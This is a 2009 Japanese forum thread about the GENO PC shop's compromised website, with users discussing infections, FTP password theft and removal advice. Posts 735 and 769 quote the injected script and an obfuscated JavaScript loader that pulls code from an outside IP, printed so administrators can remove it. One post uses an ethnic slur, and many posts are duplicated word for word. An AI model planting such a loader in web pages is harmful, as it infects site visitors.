【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
724 : ホトケノザ(長屋):2009/04/12(日) 00:27:54.62 ID:IScGCUli
OperaでJavaScript、JAVA、プラグイン無効でアクセスしたのに感染したっぽい。
ハードウェアが大幅に変更されたとか言われたが全く変更してないし正規のXPなのに
ハードウェアが大幅に変更されたとか言われたが全く変更してないし正規のXPなのに
725 : リナリア アルピナ(dion軍):2009/04/12(日) 00:28:58.85 ID:3Mun2xcR
もう許してやれよ
お前らが騒いでも何の効果も無いし
お前らが騒いでも何の効果も無いし
726 : オキザリス(catv?):2009/04/12(日) 00:29:44.81 ID:OWEAkl7B
でまだ危険状態は続いているわけ?
727 : イヌムレスズメ(アラバマ州):2009/04/12(日) 00:41:47.36 ID:BQ8lZ0RD
http://www.げの-web.jp/Goods/GA07031000
[良品中古] Intel Pentium4 2.40GHz Socket478 (512KB/ 800MHz/ −)
[商品番号] GA07031000
[販売価格] 99,999,999
[ポイント] 1
[在庫数] 7
正常じゃないことだけは確か
[良品中古] Intel Pentium4 2.40GHz Socket478 (512KB/ 800MHz/ −)
[商品番号] GA07031000
[販売価格] 99,999,999
[ポイント] 1
[在庫数] 7
正常じゃないことだけは確か
728 : オオイヌノフグリ(catv?):2009/04/12(日) 00:57:19.65 ID:0sHcqYMr
>>727
だいぶ前からたまに見かけるけど?w
だいぶ前からたまに見かけるけど?w
729 : クレマチス・モンタナ(石川県):2009/04/12(日) 01:46:24.25 ID:T7I2H8ON
>>725
俺のパソコン2台壊されて許すも何も
俺のパソコン2台壊されて許すも何も
730 : ハボタン(関西地方):2009/04/12(日) 01:48:42.40 ID:DQ4vPL7Y
>>729
wwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwwwwwww
731 : マーガレットタンポポ(新潟県):2009/04/12(日) 01:51:03.73 ID:luWMwK1t
732 : プリムラ・ダリアリカ(岩手県):2009/04/12(日) 01:57:19.63 ID:BZ/YY37Q
ウィルスでパソコン壊れるとか言う奴はもういないと思ってた
733 : シナノナデシコ(東京都):2009/04/12(日) 02:01:30.13 ID:DGxBeA07
ID:g6SEJUpr
ID:2tdCnggL
チョン臭いな
ID:2tdCnggL
チョン臭いな
734 : マムシグサ(dion軍):2009/04/12(日) 02:04:31.20 ID:81HOnR86
これに限らず擁護レスって
コネチカットが妙に多いよなw
コネチカットが妙に多いよなw
735 : ジギタリス(東京都):2009/04/12(日) 02:06:36.43 ID:adbn5aGs
>>731
利用者からの通報を受けて一時閉鎖し、サーバー会社と連絡を取りながら確認作業中とのこと。
ソースチェッカーオンラインに残っていた「2009/04/10 13:38」のキャッシュを見たら、
<script src=//94.247.2●195/jquery.js></script>になるコードがあった。的中だね。
利用者からの通報を受けて一時閉鎖し、サーバー会社と連絡を取りながら確認作業中とのこと。
ソースチェッカーオンラインに残っていた「2009/04/10 13:38」のキャッシュを見たら、
<script src=//94.247.2●195/jquery.js></script>になるコードがあった。的中だね。
736 : ペチュニア(北海道):2009/04/12(日) 02:20:29.70 ID:tDouvA5w
これ既出?
★No. 179 管理人 2009/01/25 16:51
サイトの改竄にご注意下さい
先日、ご自分のサイトが勝手に改竄されたという相談があり、FTPのログを
調べましたところ、同様の手口で被害に逢われた方が他にもおられた事が
判明しました。
こちらで把握した方々には連絡済ですが、ログは一ヶ月分しか残していない
ため、他にも同様の手口で改竄された可能性がありますのでご注意下さい。
今のところわかっている事は次の通りです。
・FTPを使って index.html を読み出し、何らかの改竄をして上書きされる
・改竄によって、閲覧者はウイルスの仕込まれたサイトに接続させられる
(ウイルス名はTrojan-Downloader.HTML.Agent.mu ただし違うケースもある)
・FTPの接続元は、海外(ラトビア共和国)
・パスワードアタックをされた形跡はない
・パスワードを変えてもすぐに同じで被害に逢う
以上の事から、何らかの手段でパスワードが盗まれたものと思われます。
また、パスワードを変えても再度被害に逢う事から、ウイルスやマルウエア
などによるものと考えられます。
もし、このような事に遭遇しましたら、ご自分のPCをウイルスチェック
した後にパスワードを変更して下さい。また、パスワードは誰にも知られ
ないよう管理にご注意下さい。
http://kemono.cc/sys/kemonobbs.cgi
★No. 179 管理人 2009/01/25 16:51
サイトの改竄にご注意下さい
先日、ご自分のサイトが勝手に改竄されたという相談があり、FTPのログを
調べましたところ、同様の手口で被害に逢われた方が他にもおられた事が
判明しました。
こちらで把握した方々には連絡済ですが、ログは一ヶ月分しか残していない
ため、他にも同様の手口で改竄された可能性がありますのでご注意下さい。
今のところわかっている事は次の通りです。
・FTPを使って index.html を読み出し、何らかの改竄をして上書きされる
・改竄によって、閲覧者はウイルスの仕込まれたサイトに接続させられる
(ウイルス名はTrojan-Downloader.HTML.Agent.mu ただし違うケースもある)
・FTPの接続元は、海外(ラトビア共和国)
・パスワードアタックをされた形跡はない
・パスワードを変えてもすぐに同じで被害に逢う
以上の事から、何らかの手段でパスワードが盗まれたものと思われます。
また、パスワードを変えても再度被害に逢う事から、ウイルスやマルウエア
などによるものと考えられます。
もし、このような事に遭遇しましたら、ご自分のPCをウイルスチェック
した後にパスワードを変更して下さい。また、パスワードは誰にも知られ
ないよう管理にご注意下さい。
http://kemono.cc/sys/kemonobbs.cgi
737 : クレマチス・モンタナ(dion軍):2009/04/12(日) 02:26:37.47 ID:qWUyDQTE
初見だな
サーバ管理者側はどういう経路でしこまれたのか
まだわかってないんだよね
メールなんてそうそうひっかかるもんじゃないと思うんだけどなあ
サーバ管理者側はどういう経路でしこまれたのか
まだわかってないんだよね
メールなんてそうそうひっかかるもんじゃないと思うんだけどなあ
738 : クレマチス・モンタナ(dion軍):2009/04/12(日) 02:27:18.43 ID:qWUyDQTE
一応セキュ板にも貼っとくよ
739 : クレマチス・モンタナ(dion軍):2009/04/12(日) 02:29:37.52 ID:qWUyDQTE
パスワードをかえても被害にあうってことは
GENOは原因を除去できたのかな
GENOは原因を除去できたのかな
740 : クレマチス(茨城県):2009/04/12(日) 02:30:04.71 ID:KjnJuqxz
741 : クレマチス・モンタナ(dion軍):2009/04/12(日) 02:30:52.08 ID:qWUyDQTE
>>740
それは最初からだれも信じてないと思う
それは最初からだれも信じてないと思う
真っ先に自分の所へアクセスした証拠(キャッシュ)を消せと言うような店だしな
744 : ポロニア・ヘテロフィア(dion軍):2009/04/12(日) 02:47:19.96 ID:utVS8n+Z
キ....キサマラ雑魚に......こ、ここまで手こずるとは.............
喰らえ.........GENO流奥義!!..................必殺!!.....証 拠 隠 滅 !!!!!!!!!!!!!!!!!!!!!!デリャ〜〜
喰らえ.........GENO流奥義!!..................必殺!!.....証 拠 隠 滅 !!!!!!!!!!!!!!!!!!!!!!デリャ〜〜
745 : タニウズキ(群馬県):2009/04/12(日) 03:38:06.64 ID:0m+R6IrI
746 : ガーベラ(アラバマ州):2009/04/12(日) 03:59:03.72 ID:2Astlh/S
2ちゃんに書き込んだりチェックする暇がある癖に何日もウイルス放置
極悪店じゃないか
極悪店じゃないか
747 : シバザクラ・フロッグストラモンティ(アラバマ州):2009/04/12(日) 04:12:39.57 ID:/9DqES5v
>>736
>・パスワードを変えてもすぐに同じで被害に逢う
GENOの説明の「外部からのアクセスができないように対処いたしました」というのは
パスが漏れる理由が分からないから、FTPの接続をIPかドメインで制限したって事かw
GENOには危なくて近寄れんな。
>・パスワードを変えてもすぐに同じで被害に逢う
GENOの説明の「外部からのアクセスができないように対処いたしました」というのは
パスが漏れる理由が分からないから、FTPの接続をIPかドメインで制限したって事かw
GENOには危なくて近寄れんな。
748 : フモトスミレ(福岡県):2009/04/12(日) 04:15:45.97 ID:STG8gQM+
686 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/09(木) 23:34:30
今年に入って必死にスパム送りまくってロガーからftp手動で頑張って流行らそうとしてるktがいるんだろ
今年に入って必死にスパム送りまくってロガーからftp手動で頑張って流行らそうとしてるktがいるんだろ
749 : フモトスミレ(福岡県):2009/04/12(日) 04:17:04.18 ID:STG8gQM+
∩_∩∩_∩
ガク((;・ω・)・ω・))ブル
| つ⊂ |
ガク((;・ω・)・ω・))ブル
| つ⊂ |
750 : ナツグミ(catv?):2009/04/12(日) 04:32:44.42 ID:zFZQexob
利用してよかった通販パソコンショップは? - 口コミ評判比較ランキング - GENO
http://www.nandemo-best10.com/f_pcshop-tuhan/z127.html
http://www.nandemo-best10.com/f_pcshop-tuhan/z127.html
751 : モッコウバラ(栃木県):2009/04/12(日) 04:37:38.25 ID:CO/XINkm
>>736
そういやにゅすけさんとこもサイト改竄されてウイルス仕込まれたって日記にあったな
そういやにゅすけさんとこもサイト改竄されてウイルス仕込まれたって日記にあったな
752 : ロベリア(アラバマ州):2009/04/12(日) 04:43:26.61 ID:sChJeI99
firefoxスタートページ→5分くらいフリーズ→復活→
ちょこちょこ動かす→フリーズ→復活→うごかす
→フリーズ→「仮想メモリが少ないです」的な警告
これはやってしまったということでしょうか?
ちょこちょこ動かす→フリーズ→復活→うごかす
→フリーズ→「仮想メモリが少ないです」的な警告
これはやってしまったということでしょうか?
753 : 水芭蕉(千葉県):2009/04/12(日) 04:45:32.29 ID:uj76mMiD
>>752
ご冥福をお祈りします
ご冥福をお祈りします
754 : ジロボウエンゴサク(福島県):2009/04/12(日) 05:05:28.33 ID:ft5vtJV3
なんでこの時期に・・まさか国策(ry
755 : シラネアオイ(dion軍):2009/04/12(日) 05:09:44.86 ID:k5LPJ6k9
久しぶりにのぞいたらまだ続いてたwwwwwwwww
756 : ムラサキサギゴケ(山梨県):2009/04/12(日) 07:18:13.11 ID:laNMUnTw
これは陰謀だよ
嵌められたんだ
嵌められたんだ
757 : トウゴクシソバタツナミ(愛知県):2009/04/12(日) 07:32:03.54 ID:pH4VjWH8
げの不買運動始めますた
もともと見るだけで利用したことはないんだけどね
もともと見るだけで利用したことはないんだけどね
758 : マーガレット(茨城県):2009/04/12(日) 07:58:07.62 ID:h37WltQx
不買もなにも、怖くて近寄れないし・・
759 : マーガレットタンポポ(宮城県):2009/04/12(日) 08:31:58.57 ID:5GfWSSnH
またウイルス復活したって本当?
760 : エビネ(関西地方):2009/04/12(日) 08:43:56.97 ID:4IcVrQps
∩_∩∩_∩
ガク((;・ω・)・ω・))ブル
| つ⊂ |
761 : ポピー(長屋):2009/04/12(日) 08:51:01.77 ID:gJobgD/s
まだやってんのかよ
762 : コデマリ(アラバマ州):2009/04/12(日) 08:51:16.62 ID:yu2/7vd3
こういう件は、IPAの窓口に届けると対応が期待できる。
さすがにいきなり警察に送っても対応できんだろ・・・。
コンピュータウイルスを発見、またはコンピュータウイルスに感染した場合には、
感染被害の拡大と再発防止に役立てるために、IPA/ISEC に届出をして下さい。
届出の際は、以下の届出様式をご使用下さい。届出は、郵送、FAX、E-mail、
Webにて受けつけております。
http://www.ipa.go.jp/security/outline/todokede-j.html
さすがにいきなり警察に送っても対応できんだろ・・・。
コンピュータウイルスを発見、またはコンピュータウイルスに感染した場合には、
感染被害の拡大と再発防止に役立てるために、IPA/ISEC に届出をして下さい。
届出の際は、以下の届出様式をご使用下さい。届出は、郵送、FAX、E-mail、
Webにて受けつけております。
http://www.ipa.go.jp/security/outline/todokede-j.html
763 : ジギタリス(東京都):2009/04/12(日) 09:04:58.46 ID:N0K6ZgVc
firefoxのnoscript愛用者いますか?
764 : シデ(栃木県):2009/04/12(日) 09:06:32.36 ID:cT4jpGAq
こういう時アンチウィルスソフトの
価値が決まるよな。
価値が決まるよな。
765 : チューリップ(徳島県):2009/04/12(日) 09:20:40.97 ID:X8hCIKVc
逆にFxつかっててNoScriptいれてないやつって何なの?
766 : プリムラ・ラウレンチアナ(長屋):2009/04/12(日) 09:30:37.61 ID:RnKSgIO2
アンチウィルス頼りじゃ対応するまで何日も防げない。ソフトウェアは常に最新に保つようにしないと。
767 : スイセン(東京都):2009/04/12(日) 10:07:55.88 ID:DAfoNBO4
げの
768 : カキツバタ(アラバマ州):2009/04/12(日) 10:25:48.79 ID:s9j1n0j5
専門家に聞く コラム
Q&A コラム
現場から 【緊急警報】マルウエアが暴れています。
田中 とも彦 専門分野:Webサイト制作 2009/04/08 12:12 コンテンツ評価:20pt
【緊急警報】マルウエアが暴れています。
某担当が弊社で管理をしているサイトをレビューしていたら、アンチウィルスソフトより警告がでました。
「マルウエア」です。
送信先は 94.247.2.195 です。
こんなサイトは注意。
Flashを用いているサイト。
駆除方法(サイトを訪問してしまった方)
AdobeのFlashとAcrobatを最新のものにして下さい。
Windows Updateをして下さい。
アンチウィルスソフトで駆除して下さい。
何もやらずにパソコンを終了すると、二度と起動してくれなくなる可能性があります。
Q&A コラム
現場から 【緊急警報】マルウエアが暴れています。
田中 とも彦 専門分野:Webサイト制作 2009/04/08 12:12 コンテンツ評価:20pt
【緊急警報】マルウエアが暴れています。
某担当が弊社で管理をしているサイトをレビューしていたら、アンチウィルスソフトより警告がでました。
「マルウエア」です。
送信先は 94.247.2.195 です。
こんなサイトは注意。
Flashを用いているサイト。
駆除方法(サイトを訪問してしまった方)
AdobeのFlashとAcrobatを最新のものにして下さい。
Windows Updateをして下さい。
アンチウィルスソフトで駆除して下さい。
何もやらずにパソコンを終了すると、二度と起動してくれなくなる可能性があります。
769 : カキツバタ(アラバマ州):2009/04/12(日) 10:27:32.24 ID:s9j1n0j5
>>768
駆除方法(サイト管理者)
怪しいJS(JavaScript)が記述されています。
.jsまたは .htmlなどに次ぎのソースが記述されていたら削除して下さい。
document.write(unescape ('%3C4x4sWXkcr4Si4x4plct4x4%20P0srP0cWXk%3DC2
%2F %2F4x49lc4lc%2EP02C247lc%2E4S2%2E1lc95%2FP0jP0qu4x4erP0y%2Ejs%3E4x
4%3Cmb%2FC2s4x4cript4S%3E'). replace(/WXk|4S|P0|4x4|mb|lc|C2 /g,"")
この記述を解読すると「94.247.2.195/jquery.js」となっており
このIPへアクセスをしてしまいます。 参考サイト(有志の皆さんに感謝)
「半角カナのように」さんのサイト PC通販ショップGENOのサイトにマルウェア
(ウィルス?)仕込まれて騒動中
「(む)ぶろぐ - リネージュ2個人情報サイト」さんのサイト
PCショップ「GENO」ウイルス感染っぽい[ パソコン関連 ]
株式会社ハマ企画 代表取締役
田中 とも彦 (Webプロデューサー)
経験を活かした技術力で、ユーザビリティの高いサイトを構築
Webサイト制作,ITコンサルティング・企画 ユーザビリティ・アクセシビリティ改善,
Webサイト企画・設計,ログ解析・効果測定
駆除方法(サイト管理者)
怪しいJS(JavaScript)が記述されています。
.jsまたは .htmlなどに次ぎのソースが記述されていたら削除して下さい。
document.write(unescape ('%3C4x4sWXkcr4Si4x4plct4x4%20P0srP0cWXk%3DC2
%2F %2F4x49lc4lc%2EP02C247lc%2E4S2%2E1lc95%2FP0jP0qu4x4erP0y%2Ejs%3E4x
4%3Cmb%2FC2s4x4cript4S%3E'). replace(/WXk|4S|P0|4x4|mb|lc|C2 /g,"")
この記述を解読すると「94.247.2.195/jquery.js」となっており
このIPへアクセスをしてしまいます。 参考サイト(有志の皆さんに感謝)
「半角カナのように」さんのサイト PC通販ショップGENOのサイトにマルウェア
(ウィルス?)仕込まれて騒動中
「(む)ぶろぐ - リネージュ2個人情報サイト」さんのサイト
PCショップ「GENO」ウイルス感染っぽい[ パソコン関連 ]
株式会社ハマ企画 代表取締役
田中 とも彦 (Webプロデューサー)
経験を活かした技術力で、ユーザビリティの高いサイトを構築
Webサイト制作,ITコンサルティング・企画 ユーザビリティ・アクセシビリティ改善,
Webサイト企画・設計,ログ解析・効果測定
770 : ケブカツルカコソウ(埼玉県):2009/04/12(日) 10:40:06.94 ID:GJpTz+9X
感染したPCでネットに繋ぐようなことを簡単に促す専門家はどうかと思う
771 : シラー・カンパヌラータ(新潟県):2009/04/12(日) 10:41:57.14 ID:UWygLkqD
genoを許す許さないじゃなく(許さないけど)
同じ手口を使ったものがどんどん広がっているのが問題だな
同じ手口を使ったものがどんどん広がっているのが問題だな
772 : クレマチス(アラバマ州):2009/04/12(日) 10:44:10.11 ID:AFsaurVx
genoを許す許さないじゃなく(許さないけど)
キャッシュ消せやサーバートラブルで済ますのがどんどん広がっているのが問題だな
キャッシュ消せやサーバートラブルで済ますのがどんどん広がっているのが問題だな
773 : シュッコン・バーベナ(catv?):
Windows Updateが出来ない症状が出てるケースを把握してない
売名か?
売名失敗だな>株式会社ハマ企画 代表取締役
田中 とも彦 (Webプロデューサー)
売名か?
売名失敗だな>株式会社ハマ企画 代表取締役
田中 とも彦 (Webプロデューサー)